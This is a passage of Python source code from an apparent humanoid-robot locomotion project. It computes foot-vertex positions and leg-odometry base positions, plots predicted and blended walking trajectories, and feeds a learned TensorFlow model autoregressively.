BR_vertex_pos = self.local_foot_vertices_pos[3]
# Compute right foot (RF) transform w.r.t. the world (W) frame
base_H_r_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="r_foot")
W_H_RF = world_H_base.dot(base_H_r_foot)
# Get the right-foot vertices positions in the world frame
W_RFL_vertex_pos_hom = W_H_RF @ np.concatenate((FL_vertex_pos, [1]))
W_RFR_vertex_pos_hom = W_H_RF @ np.concatenate((FR_vertex_pos, [1]))
W_RBL_vertex_pos_hom = W_H_RF @ np.concatenate((BL_vertex_pos, [1]))
W_RBR_vertex_pos_hom = W_H_RF @ np.concatenate((BR_vertex_pos, [1]))
# Convert homogeneous to cartesian coordinates
W_RFL_vertex_pos = W_RFL_vertex_pos_hom[0:3]
W_RFR_vertex_pos = W_RFR_vertex_pos_hom[0:3]
W_RBL_vertex_pos = W_RBL_vertex_pos_hom[0:3]
W_RBR_vertex_pos = W_RBR_vertex_pos_hom[0:3]
# Compute left foot (LF) transform w.r.t. the world (W) frame
base_H_l_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="l_foot")
W_H_LF = world_H_base.dot(base_H_l_foot)
# Get the left-foot vertices positions wrt the world frame
W_LFL_vertex_pos_hom = W_H_LF @ np.concatenate((FL_vertex_pos, [1]))
W_LFR_vertex_pos_hom = W_H_LF @ np.concatenate((FR_vertex_pos, [1]))
W_LBL_vertex_pos_hom = W_H_LF @ np.concatenate((BL_vertex_pos, [1]))
W_LBR_vertex_pos_hom = W_H_LF @ np.concatenate((BR_vertex_pos, [1]))
# Convert homogeneous to cartesian coordinates
W_LFL_vertex_pos = W_LFL_vertex_pos_hom[0:3]
W_LFR_vertex_pos = W_LFR_vertex_pos_hom[0:3]
W_LBL_vertex_pos = W_LBL_vertex_pos_hom[0:3]
W_LBR_vertex_pos = W_LBR_vertex_pos_hom[0:3]
# Store the positions of both right-foot and left-foot vertices in the world frame
W_vertices_positions = [W_RFL_vertex_pos, W_RFR_vertex_pos, W_RBL_vertex_pos, W_RBR_vertex_pos,
W_LFL_vertex_pos, W_LFR_vertex_pos, W_LBL_vertex_pos, W_LBR_vertex_pos]
return W_vertices_positions
def set_initial_support_vertex_and_support_foot(self) -> None:
"""Compute initial support foot and support vertex positions in the world frame, along with the support vertex offset."""
# Compute support foot position wrt the world frame
world_H_base = self.kindyn.get_world_base_transform()
base_H_SF = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
W_H_SF = world_H_base.dot(base_H_SF)
W_support_foot_pos = W_H_SF[0:3, -1]
# Compute support vertex position wrt the world frame
F_support_vertex_pos = self.local_foot_vertices_pos[self.support_vertex]
F_support_vertex_pos_hom = np.concatenate((F_support_vertex_pos, [1]))
W_support_vertex_pos_hom = W_H_SF @ F_support_vertex_pos_hom
W_support_vertex_pos = W_support_vertex_pos_hom[0:3]
# Set initial support foot and support vertex positions, along with the support vertex offset
self.support_foot_pos = W_support_foot_pos
self.support_vertex_pos = W_support_vertex_pos
self.support_vertex_offset = [W_support_vertex_pos[0], W_support_vertex_pos[1], 0]
def reset_robot_configuration(self,
joint_positions: List,
base_position: List,
base_quaternion: List) -> None:
"""Reset the robot configuration."""
world_H_base = numpy.FromNumPy.to_idyntree_transform(
position=np.array(base_position),
quaternion=np.array(base_quaternion)).asHomogeneousTransform().toNumPy()
self.kindyn.set_robot_state(s=joint_positions, ds=np.zeros(len(joint_positions)), world_H_base=world_H_base)
def reset_visual_robot_configuration(self,
joint_positions: List = None,
base_position: List = None,
base_quaternion: List = None) -> None:
"""Reset the configuration of the robot visualized in the simulator."""
# Reset joint configuration
if joint_positions is not None:
self.icub.to_gazebo().reset_joint_positions(joint_positions, self.controlled_joints)
# Reset base pose
if base_position is not None and base_quaternion is not None:
self.icub.to_gazebo().reset_base_pose(base_position, base_quaternion)
elif base_quaternion is not None:
self.icub.to_gazebo().reset_base_orientation(base_quaternion)
elif base_position is not None:
self.icub.to_gazebo().reset_base_position(base_position)
# Step the simulator (visualization only)
self.gazebo.run(paused=True)
def compute_and_apply_kinematically_feasible_base_position(self,
joint_positions: List,
base_quaternion: List) -> List:
"""Compute kinematically-feasible base position and update the robot configuration."""
# Recompute base position by leg odometry
kinematically_feasible_base_pos = self.compute_base_position_by_leg_odometry()
# Update the base position in the robot configuration
self.reset_robot_configuration(joint_positions=joint_positions,
base_position=kinematically_feasible_base_pos,
base_quaternion=base_quaternion)
# Update the base position in the configuration of the robot visualized in the simulator
self.reset_visual_robot_configuration(base_position=kinematically_feasible_base_pos)
return kinematically_feasible_base_pos
def compute_base_position_by_leg_odometry(self) -> List:
"""Compute kinematically-feasible base position using leg odometry."""
# Get the base (B) position in the world (W) frame
W_pos_B = self.kindyn.get_world_base_transform()[0:3, -1]
# Get the support vertex position in the world (W) frame
W_support_vertex_pos = self.support_vertex_pos
# Get the support vertex orientation in the world (W) frame, defined as the support foot (SF) orientation
world_H_base = self.kindyn.get_world_base_transform()
base_H_SF = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
W_H_SF = world_H_base.dot(base_H_SF)
W_support_vertex_quat = Quaternion.from_matrix(W_H_SF[0:3, 0:3])
# Compute the transform of the support vertex (SV) in the world (W) frame
W_H_SV = Transform.from_position_and_quaternion(position=np.asarray(W_support_vertex_pos),
quaternion=np.asarray(W_support_vertex_quat))
# Express the base (B) position in the support vertex (SV) reference frame
SV_H_W = np.linalg.inv(W_H_SV)
W_pos_B_hom = np.concatenate((W_pos_B, [1]))
SV_pos_B_hom = SV_H_W @ W_pos_B_hom
# Express the base (B) position in a reference frame oriented as the world but positioned in the support vertex (SV)
mixed_H_SV = Transform.from_position_and_quaternion(position=np.asarray([0, 0, 0]),
quaternion=np.asarray(W_support_vertex_quat))
mixed_pos_B_hom = mixed_H_SV @ SV_pos_B_hom
# Convert homogeneous to cartesian coordinates
mixed_pos_B = mixed_pos_B_hom[0:3]
# Compute the kinematically-feasible base position, i.e. the base position such that the support
# vertex remains fixed while the robot configuration changes
kinematically_feasible_base_position = mixed_pos_B + self.support_vertex_offset
return kinematically_feasible_base_position
def update_support_vertex_and_support_foot(self) -> (str, bool, bool):
"""Update the support vertex and the support foot. Also, return boolean variables indicating whether the
deactivation time of the last footstep needs to be updated (update_footstep_deactivation_time) and whether
a new footstep needs to be added to the footsteps list (update_footsteps_list)."""
update_footsteps_list = False
# Associate feet vertices names to indexes
vertex_indexes_to_names = {0: "RFL", 1: "RFR", 2: "RBL", 3: "RBR",
4: "LFL", 5: "LFR", 6: "LBL", 7: "LBR"}
# Retrieve the vertices positions in the world frame
W_vertices_positions = self.compute_W_vertices_pos()
# Compute the current support vertex
vertices_heights = [W_vertex[2] for W_vertex in W_vertices_positions]
self.support_vertex = np.argmin(vertices_heights)
# Check whether the deactivation time of the last footstep needs to be updated
update_footstep_deactivation_time = self.footsteps_extractor.should_update_footstep_deactivation_time(kindyn=self.kindyn)
# If the support vertex did not change
if self.support_vertex == self.support_vertex_prev:
# Update support foot position and support vertex position
world_H_base = self.kindyn.get_world_base_transform()
base_H_support_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
W_H_SF = world_H_base.dot(base_H_support_foot)
self.support_foot_pos = W_H_SF[0:3, -1]
self.support_vertex_pos = W_vertices_positions[self.support_vertex]
# If the support vertex changed
else:
# Update the support foot
if vertex_indexes_to_names[self.support_vertex][0] == "R":
self.support_foot = "r_foot"
else:
self.support_foot = "l_foot"
# If the support foot changed
if self.support_foot != self.support_foot_prev:
# Indicate that a new footstep needs to be added to the footsteps list
update_footsteps_list = True
# Update support foot prev
self.support_foot_prev = self.support_foot
# Update support foot position and support vertex position
world_H_base = self.kindyn.get_world_base_transform()
base_H_support_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
W_H_SF = world_H_base.dot(base_H_support_foot)
self.support_foot_pos = W_H_SF[0:3, -1]
self.support_vertex_pos = W_vertices_positions[self.support_vertex]
# Update also the vertex offset
self.support_vertex_offset = [self.support_vertex_pos[0], self.support_vertex_pos[1], 0]
# Update support vertex prev
self.support_vertex_prev = self.support_vertex
return self.support_foot, update_footstep_deactivation_time, update_footsteps_list
@dataclass
class Plotter:
"""Class to handle the plots related to the trajectory generation pipeline."""
# Axis of the composed ellipsoid constraining the last point of the Bezier curve of base positions
ellipsoid_forward_axis: float
ellipsoid_side_axis: float
ellipsoid_backward_axis: float
# Scaling factor for all the axes of the composed ellipsoid
ellipsoid_scaling: float
@staticmethod
def build(ellipsoid_forward_axis: float = 1.0,
ellipsoid_side_axis: float = 0.9,
ellipsoid_backward_axis: float = 0.6,
ellipsoid_scaling: float = 0.4) -> "Plotter":
"""Build an instance of Plotter."""
return Plotter(ellipsoid_forward_axis=ellipsoid_forward_axis,
ellipsoid_side_axis=ellipsoid_side_axis,
ellipsoid_backward_axis=ellipsoid_backward_axis,
ellipsoid_scaling=ellipsoid_scaling)
@staticmethod
def plot_blending_coefficients(figure_blending_coefficients: int, blending_coeffs: Dict) -> None:
"""Plot the activations of the blending coefficients."""
plt.figure(figure_blending_coefficients)
plt.clf()
# Plot blending coefficients
plt.plot(range(len(blending_coeffs["w_1"])), blending_coeffs["w_1"], 'r')
plt.plot(range(len(blending_coeffs["w_2"])), blending_coeffs["w_2"], 'b')
plt.plot(range(len(blending_coeffs["w_3"])), blending_coeffs["w_3"], 'g')
plt.plot(range(len(blending_coeffs["w_4"])), blending_coeffs["w_4"], 'y')
# Plot configuration
plt.title("Blending coefficients profiles")
plt.ylabel("Blending coefficients")
plt.xlabel("Time [s]")
@staticmethod
def plot_new_footstep(figure_footsteps: int, support_foot: str, new_footstep: Dict) -> None:
"""Plot a new footstep just added to the footsteps list."""
plt.figure(figure_footsteps)
# Plot left footsteps in blue, right footsteps in red
colors={"l_foot": 'b', "r_foot": 'r'}
# Footstep position
plt.scatter(new_footstep["2D_pos"][1], -new_footstep["2D_pos"][0], c=colors[support_foot])
# Footstep orientation (scaled for visualization purposes)
plt.plot([new_footstep["2D_pos"][1], new_footstep["2D_pos"][1] + math.sin(new_footstep["2D_orient"]) / 10],
[-new_footstep["2D_pos"][0], -new_footstep["2D_pos"][0] - math.cos(new_footstep["2D_orient"]) / 10],
colors[support_foot])
# Plot configuration
plt.axis('scaled')
plt.xlim([-6, 6])
plt.ylim([-6, 6])
plt.title("Footsteps")
@staticmethod
def plot_predicted_future_trajectory(figure_facing_dirs: int, figure_base_vel: int, denormalized_current_output: List) -> None:
"""Plot the future trajectory predicted by the network (magenta)."""
# Retrieve predicted base positions, facing directions and base velocities from the denormalized network output
predicted_base_pos = denormalized_current_output[0:12]
predicted_facing_dirs = denormalized_current_output[12:24]
predicted_base_vel = denormalized_current_output[24:36]
plt.figure(figure_facing_dirs)
for k in range(0, len(predicted_base_pos), 2):
# Plot base positions
base_position = [predicted_base_pos[k], predicted_base_pos[k + 1]]
plt.scatter(-base_position[1], base_position[0], c='m')
# Plot facing directions (scaled for visualization purposes)
facing_direction = [predicted_facing_dirs[k] / 10, predicted_facing_dirs[k + 1] / 10]
plt.plot([-base_position[1], -base_position[1] - facing_direction[1]],
[base_position[0], base_position[0] + facing_direction[0]],
'm')
plt.figure(figure_base_vel)
for k in range(0, len(predicted_base_pos), 2):
# Plot base positions
base_position = [predicted_base_pos[k], predicted_base_pos[k + 1]]
plt.scatter(-base_position[1], base_position[0], c='m')
# Plot base velocities (scaled for visualization purposes)
base_velocity = [predicted_base_vel[k] / 10, predicted_base_vel[k + 1] / 10]
plt.plot([-base_position[1], -base_position[1] - base_velocity[1]],
[base_position[0], base_position[0] + base_velocity[0]],
'm')
@staticmethod
def plot_desired_future_trajectory(figure_facing_dirs: int, figure_base_vel: int,
quad_bezier: List, facing_dirs: List, base_velocities: List) -> None:
"""Plot the future trajectory built from user inputs (gray)."""
# Retrieve components for plotting
quad_bezier_x = [elem[0] for elem in quad_bezier]
quad_bezier_y = [elem[1] for elem in quad_bezier]
plt.figure(figure_facing_dirs)
# Plot base positions
plt.scatter(quad_bezier_x, quad_bezier_y, c='gray')
# Plot facing directions (scaled for visualization purposes)
for k in range(len(quad_bezier)):
plt.plot([quad_bezier_x[k], quad_bezier_x[k] + facing_dirs[k][0] / 10],
[quad_bezier_y[k], quad_bezier_y[k] + facing_dirs[k][1] / 10],
c='gray')
plt.figure(figure_base_vel)
# Plot base positions
plt.scatter(quad_bezier_x, quad_bezier_y, c='gray')
# Plot base velocities (scaled for visualization purposes)
for k in range(len(quad_bezier)):
plt.plot([quad_bezier_x[k], quad_bezier_x[k] + base_velocities[k][0] / 10],
[quad_bezier_y[k], quad_bezier_y[k] + base_velocities[k][1] / 10],
c='gray')
@staticmethod
def plot_blended_future_trajectory(figure_facing_dirs: int, figure_base_vel: int, blended_base_positions: List,
blended_facing_dirs: List, blended_base_velocities: List) -> None:
"""Plot the future trajectory obtained by blending the network output and the user input (green)."""
# Extract components for plotting
blended_base_positions_x = [elem[0] for elem in blended_base_positions]
blended_base_positions_y = [elem[1] for elem in blended_base_positions]
plt.figure(figure_facing_dirs)
# Plot base positions
plt.scatter(blended_base_positions_x, blended_base_positions_y, c='g')
# Plot facing directions (scaled for visualization purposes)
for k in range(len(blended_base_positions)):
plt.plot([blended_base_positions_x[k], blended_base_positions_x[k] + blended_facing_dirs[k][0] / 10],
[blended_base_positions_y[k], blended_base_positions_y[k] + blended_facing_dirs[k][1] / 10],
c='g')
plt.figure(figure_base_vel)
# Plot base positions
plt.scatter(blended_base_positions_x, blended_base_positions_y, c='g')
# Plot base velocities (scaled for visualization purposes)
for k in range(len(blended_base_positions)):
plt.plot([blended_base_positions_x[k], blended_base_positions_x[k] + blended_base_velocities[k][0] / 10],
[blended_base_positions_y[k], blended_base_positions_y[k] + blended_base_velocities[k][1] / 10],
c='g')
def plot_trajectory_blending(self, figure_facing_dirs: int, figure_base_vel: int, denormalized_current_output: List,
quad_bezier: List, facing_dirs: List, base_velocities: List, blended_base_positions: List,
blended_facing_dirs: List, blended_base_velocities: List) -> None:
"""Plot the predicted, desired and blended future ground trajectories used to build the next network input."""
# Facing directions plot
plt.figure(figure_facing_dirs)
plt.clf()
# Plot the reference frame
plt.scatter(0, 0, c='k')
plt.plot([0, 0], [0, 1 / 10], 'k')
# Plot upper semi-ellipse of the composed ellipsoid on which the last point of the Bezier curve is constrained
a = self.ellipsoid_side_axis * self.ellipsoid_scaling
b = self.ellipsoid_forward_axis * self.ellipsoid_scaling
x_coord = np.linspace(-a, a, 1000)
y_coord = b * np.sqrt( 1 - (x_coord ** 2)/(a ** 2))
plt.plot(x_coord, y_coord, 'k')
# Plot lower semi-ellipse of the composed ellipsoid on which the last point of the Bezier curve is constrained
a = self.ellipsoid_side_axis * self.ellipsoid_scaling
b = self.ellipsoid_backward_axis * self.ellipsoid_scaling
x_coord = np.linspace(-a, a, 1000)
y_coord = b * np.sqrt( 1 - (x_coord ** 2)/(a ** 2))
plt.plot(x_coord, -y_coord, 'k')
# Base velocities plot
plt.figure(figure_base_vel)
plt.clf()
# Plot the reference frame
plt.scatter(0, 0, c='k')
plt.plot([0, 0], [0, 1 / 10], 'k')
# Plot upper semi-ellipse of the composed ellipsoid on which the last point of the Bezier curve is constrained
a = self.ellipsoid_side_axis * self.ellipsoid_scaling
b = self.ellipsoid_forward_axis * self.ellipsoid_scaling
x_coord = np.linspace(-a, a, 1000)
y_coord = b * np.sqrt( 1 - (x_coord ** 2)/(a ** 2))
plt.plot(x_coord, y_coord, 'k')
# Plot lower semi-ellipse of the composed ellipsoid on which the last point of the Bezier curve is constrained
a = self.ellipsoid_side_axis * self.ellipsoid_scaling
b = self.ellipsoid_backward_axis * self.ellipsoid_scaling
x_coord = np.linspace(-a, a, 1000)
y_coord = b * np.sqrt( 1 - (x_coord ** 2)/(a ** 2))
plt.plot(x_coord, -y_coord, 'k')
# Plot the future trajectory predicted by the network
self.plot_predicted_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
denormalized_current_output=denormalized_current_output)
# Plot the future trajectory built from user inputs
self.plot_desired_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
quad_bezier=quad_bezier, facing_dirs=facing_dirs, base_velocities=base_velocities)
# Plot the future trajectory obtained by blending the network output and the user input
self.plot_blended_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
blended_base_positions=blended_base_positions,
blended_facing_dirs=blended_facing_dirs,
blended_base_velocities=blended_base_velocities)
# Configure facing directions plot
plt.figure(figure_facing_dirs)
plt.axis('scaled')
plt.xlim([-0.5, 0.5])
plt.ylim([-0.3, 0.5])
plt.axis('off')
plt.title("INTERPOLATED TRAJECTORY (FACING DIRECTIONS)")
# Configure base velocities plot
plt.figure(figure_base_vel)
plt.axis('scaled')
plt.xlim([-0.5, 0.5])
plt.ylim([-0.3, 0.5])
plt.axis('off')
plt.title("INTERPOLATED TRAJECTORY (BASE VELOCITIES)")
@dataclass
class LearnedModel:
"""Class for the direct exploitation of the model learned during training."""
# Path to the learned model
model_path: str
# Output mean and standard deviation
Ymean: List
Ystd: List
@staticmethod
def build(training_path: str) -> "LearnedModel":
"""Build an instance of LearnedModel."""
# Retrieve path to the learned model
model_path = os.path.join(training_path, "model/")
# Compute output mean and standard deviation
datapath = os.path.join(training_path, "normalization/")
Ymean, Ystd = load_output_mean_and_std(datapath)
return LearnedModel(model_path=model_path, Ymean=Ymean, Ystd=Ystd)
def restore_learned_model(self, session: tf.Session) -> tf.Graph:
"""Restore the learned model."""
# Restore the network generator
saver = tf.train.import_meta_graph(self.model_path + "/model.ckpt.meta")
saver.restore(session, tf.train.latest_checkpoint(self.model_path))
# Retrieve the graph
graph = tf.get_default_graph()
return graph
@staticmethod
def retrieve_tensors(graph: tf.Graph) -> (tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor):
"""Retrieve the tensors associated to the quantities of interest."""
# Placeholder to feed the input X
nn_X = graph.get_tensor_by_name("nn_X:0")
# Placeholder to feed the dropout probability
nn_keep_prob = graph.get_tensor_by_name("nn_keep_prob:0")
# Tensor containing the network output
output = graph.get_tensor_by_name('Squeeze:0')
# Tensor containing the blending coefficients
blending_coefficients = graph.get_tensor_by_name('Softmax:0')
return nn_X, nn_keep_prob, output, blending_coefficients
@staticmethod
def evaluate_tensors(nn_X: tf.Tensor, current_nn_X: List, nn_keep_prob: tf.Tensor, output: tf.Tensor,
blending_coefficients: tf.Tensor) -> (np.array, np.array):
"""Evaluate the tensors associated to the quantities of interest."""
# Pass the input defined at the previous iteration to the network (no dropout at inference time)
feed_dict = {nn_X: current_nn_X, nn_keep_prob: 1.0}
# Extract the output from the network
current_output = output.eval(feed_dict=feed_dict)
# Extract the blending coefficients from the network
current_blending_coefficients = blending_coefficients.eval(feed_dict=feed_dict)
return current_output, current_blending_coefficients
@dataclass
class Autoregression:
"""Class to use the network output, blended with the user-specified input, in an autoregressive fashion."""
# Component-wise input mean and standard deviation
Xmean_dict: Dict
Xstd_dict: Dict
# Robot-specific frontal base and chest directions
frontal_base_direction: List
frontal_chest_direction: List
# Predefined norm for the base velocities
base_vel_norm: float
# Blending parameters tau
tau_base_positions: float
tau_facing_dirs: float
tau_base_velocities: float
# Auxiliary variable to handle unnatural in-place rotations when the robot is stopped
nn_X_difference_norm_threshold: float
# Variables to store autoregression-relevant information for the current iteration
current_nn_X: List
current_past_trajectory_base_positions: List
current_past_trajectory_facing_directions: List
current_past_trajectory_base_velocities: List
current_base_position: np.array
current_base_yaw: float
current_ground_base_position: List = field(default_factory=lambda: [0,0])
current_facing_direction: List = field(default_factory=lambda: [1,0])
current_world_R_facing: np.array = field(default_factory=lambda: np.array([[1, 0], [0, 1]]))
# Variables to store autoregression-relevant information for the next iteration
next_nn_X: List = field(default_factory=list)
new_past_trajectory_base_positions: List = field(default_factory=list)
new_past_trajectory_facing_directions: List = field(default_factory=list)
new_past_trajectory_base_velocities: List = field(default_factory=list)
new_base_position: List = field(default_factory=list)
new_facing_direction: List = field(default_factory=list)
new_world_R_facing: List = field(default_factory=list)
new_facing_R_world: List = field(default_factory=list)
new_ground_base_position: List = field(default_factory=list)
new_base_yaw: List = field(default_factory=list)
# Number of points constituting the Bezier curve
t: List = field(default_factory=lambda: np.linspace(0, 1, 7))
# Relevant indexes of the window storing past data
past_window_indexes: List = field(default_factory=lambda: [0, 10, 20, 30, 40, 50])
# Auxiliary variable for the robot status (moving or stopped)
stopped: bool = True
@staticmethod
def build(training_path: str,
initial_nn_X: List,
initial_past_trajectory_base_pos: List,
initial_past_trajectory_facing_dirs: List,
initial_past_trajectory_base_vel: List,
initial_base_height: List,
initial_base_yaw: float,
frontal_base_direction: List,
frontal_chest_direction: List,
base_vel_norm: float = 0.4,
tau_base_positions: float = 1.5,
tau_facing_dirs: float = 1.3,
tau_base_velocities: float = 1.3,
nn_X_difference_norm_threshold: float = 0.05) -> "Autoregression":
"""Build an instance of Autoregression."""
# Compute component-wise input mean and standard deviation
datapath = os.path.join(training_path, "normalization/")
Xmean_dict, Xstd_dict = load_component_wise_input_mean_and_std(datapath)
return Autoregression(Xmean_dict=Xmean_dict,
Xstd_dict=Xstd_dict,
frontal_base_direction=frontal_base_direction,
frontal_chest_direction=frontal_chest_direction,
base_vel_norm=base_vel_norm,
tau_base_positions=tau_base_positions,
tau_facing_dirs=tau_facing_dirs,
tau_base_velocities=tau_base_velocities,
nn_X_difference_norm_threshold=nn_X_difference_norm_threshold,
current_nn_X=initial_nn_X,
current_past_trajectory_base_positions=initial_past_trajectory_base_pos,
current_past_trajectory_facing_directions=initial_past_trajectory_facing_dirs,
current_past_trajectory_base_velocities=initial_past_trajectory_base_vel,
current_base_position=np.array([0, 0, initial_base_height]),
current_base_yaw=initial_base_yaw)
def update_reference_frame(self, world_H_base: np.array, base_H_chest: np.array) -> None:
"""Update the local reference frame given by the new base position and the new facing direction."""
# Store new base position
self.new_base_position = world_H_base[0:3, -1]
self.new_ground_base_position = [self.new_base_position[0], self.new_base_position[1]] # projected on the ground
# Retrieve new ground base direction
new_base_rotation = world_H_base[0:3, 0:3]
new_base_direction = new_base_rotation.dot(self.frontal_base_direction)
new_ground_base_direction = [new_base_direction[0], new_base_direction[1]] # projected on the ground
new_ground_base_direction = new_ground_base_direction / np.linalg.norm(new_ground_base_direction) # of unitary norm
# Retrieve new ground chest direction
world_H_chest = world_H_base.dot(base_H_chest)
new_chest_rotation = world_H_chest[0:3, 0:3]
new_chest_direction = new_chest_rotation.dot(self.frontal_chest_direction)
new_ground_chest_direction = [new_chest_direction[0], new_chest_direction[1]] # projected on the ground
new_ground_chest_direction = new_ground_chest_direction / np.linalg.norm(new_ground_chest_direction) # of unitary norm
# Store new facing direction
self.new_facing_direction = new_ground_base_direction + new_ground_chest_direction # mean of base and chest directions
self.new_facing_direction = self.new_facing_direction / np.linalg.norm(self.new_facing_direction) # of unitary norm
# Retrieve the rotation from the new facing direction to the world frame and its inverse
new_facing_direction_yaw = compute_angle_wrt_x_positive_semiaxis(self.new_facing_direction)
self.new_world_R_facing = rotation_2D(new_facing_direction_yaw)
self.new_facing_R_world = np.linalg.inv(self.new_world_R_facing)
def autoregressive_usage_base_positions(self, next_nn_X: List, denormalized_current_output: np.array,
quad_bezier: List) -> (List, List, List):
"""Use the base positions in an autoregressive fashion."""
# ===================
# PAST BASE POSITIONS
# ===================
# Update the full window storing the past base positions
new_past_trajectory_base_positions = []
for k in range(len(self.current_past_trajectory_base_positions) - 1):
# Element in the reference frame defined by the previous base position + facing direction
facing_elem = self.current_past_trajectory_base_positions[k + 1]
# Express element in world frame
world_elem = self.current_world_R_facing.dot(facing_elem) + self.current_ground_base_position
# Express element in the frame defined by the new base position + facing direction
new_facing_elem = self.new_facing_R_world.dot(world_elem - self.new_ground_base_position)
# Store updated element
new_past_trajectory_base_positions.append(new_facing_elem)
# Add as last element the current (local) base position, i.e. [0,0]
new_past_trajectory_base_positions.append(np.array([0., 0.]))
# Update past base positions
self.new_past_trajectory_base_positions = new_past_trajectory_base_positions
# Extract compressed window of past base positions (denormalized for plotting)
past_base_positions_plot = []
for index in self.past_window_indexes:
past_base_positions_plot.extend(self.new_past_trajectory_base_positions[index])
# Extract compressed window of past base positions (normalized for building the next input)
past_base_positions = past_base_positions_plot.copy()
for k in range(len(past_base_positions)):
past_base_positions[k] = (past_base_positions[k] - self.Xmean_dict["past_base_positions"][k]) / \
self.Xstd_dict["past_base_positions"][k]
# Add the compressed window of normalized past base positions to the next input
next_nn_X.extend(past_base_positions)
# =====================
# FUTURE BASE POSITIONS
# =====================
# Extract future base positions for blending (i.e. in the plot reference frame)
future_base_pos_plot = denormalized_current_output[0:12]
future_base_pos_blend = [[0.0, 0.0]]
for k in range(0, len(future_base_pos_plot), 2):
future_base_pos_blend.append([-future_base_pos_plot[k + 1], future_base_pos_plot[k]])
# Blend user-specified and network-predicted future base positions
blended_base_positions = trajectory_blending(future_base_pos_blend, quad_bezier, self.t, self.tau_base_positions)
# Reshape blended future base positions
future_base_pos_blend_features = []
for k in range(1, len(blended_base_positions)):
future_base_pos_blend_features.append(blended_base_positions[k][1])
future_base_pos_blend_features.append(-blended_base_positions[k][0])
# Normalize blended future base positions
future_base_pos_blend_features_normalized = future_base_pos_blend_features.copy()
for k in range(len(future_base_pos_blend_features_normalized)):
future_base_pos_blend_features_normalized[k] = (future_base_pos_blend_features_normalized[k] -
self.Xmean_dict["future_base_positions"][k]) / \
self.Xstd_dict["future_base_positions"][k]
# Add the normalized blended future base positions to the next input
next_nn_X.extend(future_base_pos_blend_features_normalized)
return next_nn_X, blended_base_positions, future_base_pos_blend_features
def autoregressive_usage_facing_directions(self, next_nn_X: List, denormalized_current_output: np.array,
facing_dirs: List) -> (List, List):
"""Use the facing directions in an autoregressive fashion."""
# ======================
# PAST FACING DIRECTIONS
# ======================
# Update the full window storing the past facing directions
new_past_trajectory_facing_directions = []
for k in range(len(self.current_past_trajectory_facing_directions) - 1):
# Element in the reference frame defined by the previous base position + facing direction
facing_elem = self.current_past_trajectory_facing_directions[k + 1]
# Express element in world frame
world_elem = self.current_world_R_facing.dot(facing_elem)
# Express element in the frame defined by the new base position + facing direction
new_facing_elem = self.new_facing_R_world.dot(world_elem)
# Store updated element
new_past_trajectory_facing_directions.append(new_facing_elem)
# Add as last element the current (local) facing direction, i.e. [1,0]
new_past_trajectory_facing_directions.append(np.array([1., 0.]))
# Update past facing directions
self.new_past_trajectory_facing_directions = new_past_trajectory_facing_directions
# Extract compressed window of past facing directions (denormalized for plotting)
past_facing_directions_plot = []
for index in self.past_window_indexes:
past_facing_directions_plot.extend(self.new_past_trajectory_facing_directions[index])
# Extract compressed window of past facing directions (normalized for building the next input)
past_facing_directions = past_facing_directions_plot.copy()
for k in range(len(past_facing_directions)):
past_facing_directions[k] = (past_facing_directions[k] - self.Xmean_dict["past_facing_directions"][k]) / \
self.Xstd_dict["past_facing_directions"][k]
# Add the compressed window of normalized past facing directions to the next input
next_nn_X.extend(past_facing_directions)
# ========================
# FUTURE FACING DIRECTIONS
# ========================
# Extract future facing directions for blending (i.e. in the plot reference frame)
future_facing_dirs_plot = denormalized_current_output[12:24]
future_facing_dirs_blend = [[0.0, 1.0]]
for k in range(0, len(future_facing_dirs_plot), 2):
future_facing_dirs_blend.append([-future_facing_dirs_plot[k + 1], future_facing_dirs_plot[k]])
# Blend user-specified and network-predicted future facing directions
blended_facing_dirs = trajectory_blending(future_facing_dirs_blend, facing_dirs, self.t, self.tau_facing_dirs)
# Reshape blended future facing directions
future_facing_dirs_blend_features = []
for k in range(1, len(blended_facing_dirs)):
future_facing_dirs_blend_features.append(blended_facing_dirs[k][1])
future_facing_dirs_blend_features.append(-blended_facing_dirs[k][0])
# Normalize blended future facing directions
future_facing_dirs_blend_features_normalized = future_facing_dirs_blend_features.copy()
for k in range(len(future_facing_dirs_blend_features_normalized)):
future_facing_dirs_blend_features_normalized[k] = (future_facing_dirs_blend_features_normalized[k] -
self.Xmean_dict["future_facing_directions"][k]) / \
self.Xstd_dict["future_facing_directions"][k]
# Add the normalized blended future facing directions to the next input
next_nn_X.extend(future_facing_dirs_blend_features_normalized)
return next_nn_X, blended_facing_dirs
def autoregressive_usage_base_velocities(self, next_nn_X: List, denormalized_current_output: np.array,
base_velocities: List) -> (List, List):
"""Use the base velocities in an autoregressive fashion."""
# ====================
# PAST BASE VELOCITIES
# ====================
# Update the full window storing the past base velocities
new_past_trajectory_base_velocities = []
for k in range(len(self.current_past_trajectory_base_velocities) - 1):
# Element in the reference frame defined by the previous base position + facing direction
facing_elem = self.current_past_trajectory_base_velocities[k + 1]
# Express element in world frame
world_elem = self.current_world_R_facing.dot(facing_elem)
# Express element in the frame defined by the new base position + facing direction
new_facing_elem = self.new_facing_R_world.dot(world_elem)
# Store updated element
new_past_trajectory_base_velocities.append(new_facing_elem)
# Add as last element the current (local) base velocity (this is an approximation)
new_past_trajectory_base_velocities.append(self.new_facing_R_world.dot(rotation_2D(self.new_base_yaw).dot(
[denormalized_current_output[100], denormalized_current_output[101]])))
# Update past base velocities
self.new_past_trajectory_base_velocities = new_past_trajectory_base_velocities
# Extract compressed window of past base velocities (denormalized for plotting)
past_base_velocities_plot = []
for index in self.past_window_indexes:
past_base_velocities_plot.extend(self.new_past_trajectory_base_velocities[index])
# Extract compressed window of past base velocities (normalized for building the next input)
past_base_velocities = past_base_velocities_plot.copy()
for k in range(len(past_base_velocities)):
past_base_velocities[k] = (past_base_velocities[k] - self.Xmean_dict["past_base_velocities"][k]) / \
self.Xstd_dict["past_base_velocities"][k]
# Add the compressed window of normalized past ground base velocities to the next input
next_nn_X.extend(past_base_velocities)
# ======================
